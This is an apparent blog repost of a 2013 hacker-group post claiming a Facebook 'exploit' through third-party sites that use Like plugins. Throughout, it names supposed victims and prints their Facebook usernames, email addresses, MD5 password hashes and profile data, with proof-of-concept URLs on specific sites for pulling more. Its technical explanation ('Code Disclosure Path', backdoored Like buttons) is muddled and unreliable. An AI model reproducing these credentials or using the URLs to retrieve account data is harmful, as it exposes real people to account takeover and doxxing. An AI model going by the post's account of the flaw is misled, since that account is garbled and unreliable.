J2TEAM Security: A must-have extension for Chrome users. Install now!

Exploit Facebook Via External Plugins and Modules

Facebook 0day 2013 | Juno_okyo's Blog
#############################################################
# Title: Exploit Facebook Via External Plugins and Modules  
# Exploitation: Manually (use your brain ^_^)
# Date:  28/03/2013 
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################


For Example my victim is =======>>>  https://www.facebook.com/gaturro22
How i could be able to retrieve his password ? easy
Proof of Concept : Facebook Id ====>>> gaturro22
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So as you can see we got the email & the password : 
email: gonza.la22@gmail.com

password: e10adc3949ba59abbe56e057f20f883e

Another Demo : http://www.salondaddy.com/profile.php?ID=85


So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever

It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are

backdoored with a javascript malware that can sniff all your informations ^_^

So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites

especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!

So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users ^_^ no doubt , just use your brain !

Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top

Check this :  [NickName] => orso44  ===========>>> add this to www.facebook.com

http://www.facebook.com/orso44   ============>>> Facebook Profile

[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5


Another Victim :  ==========>>> https://www.facebook.com/kornberg

Infos Retrieved :

                    [_iProfileID] => 7893
                    [_aProfile] => Array
                        (
                            [datafile] => 1
                            [ID] => 7893
                            [NickName] => Kornberg
                            [Email] => anselmpennell435@yahoo.com
                            [Password] => 087fbfdeb33dae28260cfdb8f2d8a787
                            [Status] => Active
                            {
                            "id": "862420463",
                            "name": "Zoe Kornberg",
                            "first_name": "Zoe",
                            "last_name": "Kornberg",
                            "username": "kornberg",
                            "gender": "female",
                            "locale": "en_US"
                            }

Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand

I just selected  this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!


Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!